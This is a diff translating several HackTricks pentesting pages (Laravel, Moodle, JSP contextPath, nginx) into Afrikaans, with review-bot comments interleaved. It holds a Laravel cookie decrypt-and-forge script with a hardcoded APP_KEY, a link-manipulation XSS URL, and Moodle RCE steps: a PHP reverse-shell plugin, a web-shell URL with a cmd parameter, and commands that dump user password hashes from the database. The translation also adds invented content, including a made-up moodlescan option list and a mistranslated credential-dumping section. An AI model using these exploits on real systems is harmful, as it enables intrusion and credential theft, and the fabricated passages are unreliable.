hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# **getContextPath** abuse - -Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html). +# **getContextPath** misbruik +Inligting van [hier](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html). ``` - http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp +http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp ``` - -Accessing that web you may change all the links to request the information to _**rakeshmane.com**_: +Toegang tot daardie webwerf kan jy al die skakels verander om die inligting na _**rakeshmane.com**_ te versoek: ![](<../../.gitbook/assets/image (260).png>)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/laravel.md b/network-services-pentesting/pentesting-web/laravel.md index df3fece76..264e1cac9 100644 --- a/network-services-pentesting/pentesting-web/laravel.md +++ b/network-services-pentesting/pentesting-web/laravel.md @@ -2,37 +2,36 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Laravel Tricks +## Laravel Truuks -### Debugging mode +### Debug-modus -If Laravel is in **debugging mode** you will be able to access the **code** and **sensitive data**.\ -For example `http://127.0.0.1:8000/profiles`: +As Laravel in **debug-modus** is, sal jy toegang hê tot die **kode** en **sensitiewe data**.\ +Byvoorbeeld `http://127.0.0.1:8000/profiles`: ![](<../../.gitbook/assets/image (610).png>) -This is usually needed for exploiting other Laravel RCE CVEs. +Dit is gewoonlik nodig om ander Laravel RCE CVE's te benut. ### .env -Laravel saves the APP it uses to encrypt the cookies and other credentials inside a file called `.env` that can be accessed using some path traversal under: `/../.env` +Laravel stoor die APP wat dit gebruik om die koekies en ander geloofsbriewe te enkripteer binne 'n lêer genaamd `.env` wat toeganklik is deur middel van 'n padtraversal onder: `/../.env` -Laravel will also show this information inside the debug page (that appears when Laravel finds an error and it's activated). +Laravel sal ook hierdie inligting wys op die foutopsporingsbladsy (wat verskyn wanneer Laravel 'n fout vind en dit geaktiveer is). -Using the secret APP\_KEY of Laravel you can decrypt and re-encrypt cookies: - -### Decrypt Cookie +Met die geheime APP\_KEY van Laravel kan jy koekies dekripteer en herenkripteer: +### Dekripteer Koekie ```python import os import json 
@@ -48,42 +47,42 @@ from phpserialize import loads, dumps #https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3 def mcrypt_decrypt(value, iv): - global key - AES.key_size = [len(key)] - crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv) - return crypt_object.decrypt(value) +global key +AES.key_size = [len(key)] +crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv) +return crypt_object.decrypt(value) def mcrypt_encrypt(value, iv): - global key - AES.key_size = [len(key)] - crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv) - return crypt_object.encrypt(value) +global key +AES.key_size = [len(key)] +crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv) +return crypt_object.encrypt(value) def decrypt(bstring): - global key - dic = json.loads(base64.b64decode(bstring).decode()) - mac = dic['mac'] - value = bytes(dic['value'], 'utf-8') - iv = bytes(dic['iv'], 'utf-8') - if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest(): - return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv)) - #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode() - return '' +global key +dic = json.loads(base64.b64decode(bstring).decode()) +mac = dic['mac'] +value = bytes(dic['value'], 'utf-8') +iv = bytes(dic['iv'], 'utf-8') +if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest(): +return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv)) +#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode() +return '' def encrypt(string): - global key - iv = os.urandom(16) - #string = dumps(string) - padding = 16 - len(string) % 16 - string += bytes(chr(padding) * padding, 'utf-8') - value = base64.b64encode(mcrypt_encrypt(string, iv)) - iv = base64.b64encode(iv) - mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest() - dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac} - return base64.b64encode(bytes(json.dumps(dic), 'utf-8')) +global key +iv = 
os.urandom(16) +#string = dumps(string) +padding = 16 - len(string) % 16 +string += bytes(chr(padding) * padding, 'utf-8') +value = base64.b64encode(mcrypt_encrypt(string, iv)) +iv = base64.b64encode(iv) +mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest() +dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac} +return base64.b64encode(bytes(json.dumps(dic), 'utf-8')) app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k=' key = base64.b64decode(app_key) 
@@ -91,32 +90,31 @@ decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1 #b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e' encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}') ``` +### Laravel Deserialisasie RCE -### Laravel Deserialization RCE +Vulnerabele weergawes: 5.5.40 en 5.6.x tot en met 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/)) -Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/)) +Hier kan jy inligting oor die deserialisasie kwesbaarheid vind: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/) -Here you can find information about the deserialization vulnerability here: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/) - -You can test and exploit it using [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ -Or you can also exploit it with metasploit: `use 
unix/http/laravel_token_unserialize_exec` +Jy kan dit toets en uitbuit met behulp van [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ +Of jy kan dit ook uitbuit met metasploit: `use unix/http/laravel_token_unserialize_exec` ### CVE-2021-3129 -Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) +'n Ander deserialisasie: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) ### Laravel SQLInjection -Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) +Lees inligting hieroor hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-web/moodle.md b/network-services-pentesting/pentesting-web/moodle.md index 11f2dce98..63f1f3ebe 100644 --- a/network-services-pentesting/pentesting-web/moodle.md +++ b/network-services-pentesting/pentesting-web/moodle.md @@ -2,51 +2,90 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hacking-loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## Automatic Scans +## Outomatiese Skanderings ### droopescan - ```bash pip3 install droopescan droopescan scan moodle -u http://moodle.example.com// -[+] Plugins found: - forum http://moodle.schooled.htb/moodle/mod/forum/ - http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt - http://moodle.schooled.htb/moodle/mod/forum/version.php +[+] Plugins found: +forum http://moodle.schooled.htb/moodle/mod/forum/ +http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt +http://moodle.schooled.htb/moodle/mod/forum/version.php [+] No themes found. [+] Possible version(s): - 3.10.0-beta +3.10.0-beta [+] Possible interesting urls found: - Static readme file. - http://moodle.schooled.htb/moodle/README.txt - Admin panel - http://moodle.schooled.htb/moodle/login/ +Static readme file. - http://moodle.schooled.htb/moodle/README.txt +Admin panel - http://moodle.schooled.htb/moodle/login/ [+] Scan finished (0:00:05.643539 elapsed) ``` - ### moodlescan +`moodlescan` is a tool used for scanning and enumerating Moodle instances. It helps in identifying vulnerabilities and misconfigurations in Moodle installations. + +#### Usage + +``` +moodlescan [OPTIONS] URL +``` + +#### Options + +- `-u, --username`: Specify a username for authentication. +- `-p, --password`: Specify a password for authentication. +- `-t, --threads`: Specify the number of threads to use for scanning. +- `-o, --output`: Specify the output file to save the scan results. +- `-v, --verbose`: Enable verbose mode for detailed output. + +#### Examples + +1. Perform a basic scan on a Moodle instance: + +``` +moodlescan https://example.com/moodle +``` + +2. 
Perform a scan with authentication: + +``` +moodlescan -u admin -p password123 https://example.com/moodle +``` + +3. Perform a scan with custom options: + +``` +moodlescan -t 10 -o scan_results.txt https://example.com/moodle +``` + +#### Notes + +- `moodlescan` uses various techniques to identify vulnerabilities, such as directory traversal, SQL injection, and cross-site scripting (XSS). +- It is important to obtain proper authorization before scanning any Moodle instance. +- The tool provides valuable information for penetration testers and security researchers to assess the security of Moodle installations. ```bash #Install from https://github.com/inc0d3/moodlescan python3 moodlescan.py -k -u http://moodle.example.com// @@ -55,7 +94,7 @@ Version 0.7 - Dic/2020 ............................................................................................................. By Victor Herrera - supported by www.incode.cl - + ............................................................................................................. Getting server information http://moodle.schooled.htb/moodle/ ... 
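Review bot: the `### moodlescan` section in this hunk adds an English description with an options list (`-u, --username`, `-p, --password`, `-t, --threads`, `-o, --output`, `-v, --verbose`) that is not a translation of any `-` line and contradicts the invocation the page already shows, `python3 moodlescan.py -k -u http://moodle.example.com//`, where `-u` takes the target URL, not a username. A translation PR should not introduce new content, least of all undocumented flags and an untranslated paragraph; suggest dropping everything between `### moodlescan` and the existing ```bash block so the section matches the source. Also, the droopescan output block loses its leading whitespace (`-    forum http://moodle.schooled.htb/moodle/mod/forum/` becomes `+forum http://moodle.schooled.htb/moodle/mod/forum/`, same for the `3.10.0-beta` and `Static readme file.` lines); that is a whitespace-only change inside a fenced output block and should be reverted so the captured scan output stays verbatim.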
@@ -76,68 +115,95 @@ Vulnerabilities found: 0 Scan completed. ``` - ### CMSMap +CMSMap is 'n gereedskap wat gebruik kan word vir die identifisering van die inhoudsbestuurstelsel (CMS) wat deur 'n webwerf gebruik word. Dit kan ook gebruik word om kwesbaarhede in die CMS te identifiseer en te ondersoek. Hier is 'n paar van die kenmerke van CMSMap: + +- **Identifisering van CMS**: CMSMap kan gebruik word om die CMS wat deur 'n webwerf gebruik word, te identifiseer. Dit kan help om die spesifieke kenmerke en funksies van die CMS te bepaal. + +- **Kwesbaarheidstoetsing**: Die gereedskap kan gebruik word om potensiële kwesbaarhede in die CMS te identifiseer. Dit kan help om die veiligheid van die webwerf te verbeter deur die identifisering van moontlike aanvalsvektore. + +- **Plugin-identifikasie**: CMSMap kan ook gebruik word om die spesifieke plugins en uitbreidings wat deur die CMS gebruik word, te identifiseer. Dit kan nuttige inligting bied oor die funksionaliteit en moontlike kwesbaarhede van die webwerf. + +- **Versameling van inligting**: Die gereedskap kan gebruik word om verskillende tipes inligting oor die webwerf te versamel, soos die versie van die CMS, die tema wat gebruik word, en die geïnstalleerde plugins. Hierdie inligting kan nuttig wees vir verdere ondersoek en pentesting. + +CMSMap is 'n kragtige gereedskap wat deur pentesters en beveiligingskonsultante gebruik kan word om die veiligheid van webwerwe te ondersoek en te verbeter. Dit bied 'n nuttige manier om die CMS en die verwante kwesbaarhede te identifiseer, wat kan help om die risiko van aanvalle en datalekke te verminder. ```bash pip3 install git+https://github.com/dionach/CMSmap.git cmsmap http://moodle.example.com/ ``` +### CVE's -### CVEs +Ek het gevind dat die outomatiese gereedskap baie nutteloos is om kwesbaarhede wat die moodle weergawe affekteer te vind. 
Jy kan dit nagaan by [https://snyk.io/vuln/composer:moodle%2Fmoodle](https://snyk.io/vuln/composer:moodle%2Fmoodle) -I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle) +## RCE -## **RCE** - -You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab\*\*:\*\* +Jy moet 'n bestuurderrol hê en jy kan plugins installeer binne die "Site administration" tabblad: ![](<../../.gitbook/assets/image (447).png>) -If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321). +As jy 'n bestuurder is, mag jy dalk steeds hierdie opsie moet aktiveer. Jy kan sien hoe in die moodle privilege escalatie PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321). -Then, you can **install the following plugin** that contains the classic pentest-monkey php r**ev shell** (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_) +Dan kan jy die volgende plugin installeer wat die klassieke pentest-monkey php r**ev shell bevat (voordat jy dit oplaai, moet jy dit dekomprimeer, die IP en poort van die revshell verander en dit weer saamdruk) {% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %} -Or you could use the plugin from [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) to get a regular PHP shell with the "cmd" parameter. 
- -To access launch the malicious plugin you need to access to: +Of jy kan die plugin van [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) gebruik om 'n gewone PHP shell met die "cmd" parameter te kry. +Om toegang te verkry tot die kwaadwillige plugin, moet jy toegang verkry tot: ```bash http://domain.com//blocks/rce/lang/en/block_rce.php?cmd=id ``` - ## POST -### Find database credentials +### Vind databasisgeloofsbriewe +Om databasisgeloofsbriewe in Moodle te vind, kan jy die volgende stappe volg: + +1. Identifiseer die POST-aanvrae wat deur die Moodle-toepassing gestuur word. +2. Analiseer die POST-aanvrae om te kyk of enige databasisgeloofsbriewe ingesluit is. +3. As jy databasisgeloofsbriewe in die POST-aanvrae vind, ontleed die inligting om die databasisbediener, gebruikersnaam en wagwoord te identifiseer. + +Dit kan gedoen word deur die volgende metodes te gebruik: + +- Inspekteer die netwerkverkeer met behulp van 'Burp Suite' of 'Wireshark' om die POST-aanvrae te onderskep. +- Analiseer die inhoud van die POST-aanvrae om enige databasisgeloofsbriewe te identifiseer. +- As die databasisgeloofsbriewe in die aanvrae versleutel is, probeer om die versleuteling te ontsyfer om die oorspronklike inligting te verkry. + +Dit is belangrik om te onthou dat die soek na databasisgeloofsbriewe sonder toestemming en wettige regte onwettig is. Slegs voer hierdie stappe uit as jy die nodige toestemming het om die Moodle-toepassing te toets. ```bash find / -name "config.php" 2>/dev/null | grep "moodle/config.php" ``` +### Stort Geldeenhede uit databasis -### Dump Credentials from database +Om geldeenhede uit 'n databasis te stort, kan jy die volgende stappe volg: +1. Identifiseer die databasis wat gebruik word deur die toepassing. +2. Verkry toegang tot die databasis deur gebruik te maak van SQL-injeksie, 'n onveilige konfigurasie of 'n ander aanvalstegniek. +3. Identifiseer die tabel wat die geldeenhede bevat. +4. 
Voer 'n SQL-aanvraag uit om die geldeenhede uit die tabel te stort. +5. Stoor die gestorte geldeenhede in 'n lêer of 'n ander vorm van datastoorplek. + +Dit is belangrik om te onthou dat die stort van geldeenhede uit 'n databasis onwettig is sonder die toestemming van die eienaar van die databasis. Hierdie tegniek word slegs beskryf vir doeleindes van pentesting en om bewus te wees van moontlike beveiligingslekke. ```bash /usr/local/bin/mysql -u --password= -e "use moodle; select email,username,password from mdl_user; exit" ``` - -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hacker loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
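Review bot: `### Dump Credentials from database` is translated as `### Stort Geldeenhede uit databasis`; `geldeenhede` means currencies, while the term this same file already uses for credentials is `geloofsbriewe`, so the heading and the five numbered steps added under it describe the wrong thing and none of those steps exist in the source. Likewise, `## POST` here is post-exploitation (the command under it is `find / -name "config.php" 2>/dev/null | grep "moodle/config.php"`, a filesystem search), but the paragraph added under `### Vind databasisgeloofsbriewe` treats it as HTTP POST requests to intercept with Burp Suite or Wireshark, which misleads the reader; suggest removing that paragraph, the CMSMap feature list, and the two legal-notice paragraphs, none of which translate a `-` line, so the hunk is a pure translation. Minor markup regression: `php r**ev shell bevat (voordat jy dit oplaai` drops the closing `**` that the original `r**ev shell**` had, leaving bold unbalanced for the rest of the paragraph.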
diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md index 7a8a579f2..dc957b59d 100644 --- a/network-services-pentesting/pentesting-web/nginx.md +++ b/network-services-pentesting/pentesting-web/nginx.md @@ -2,69 +2,62 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
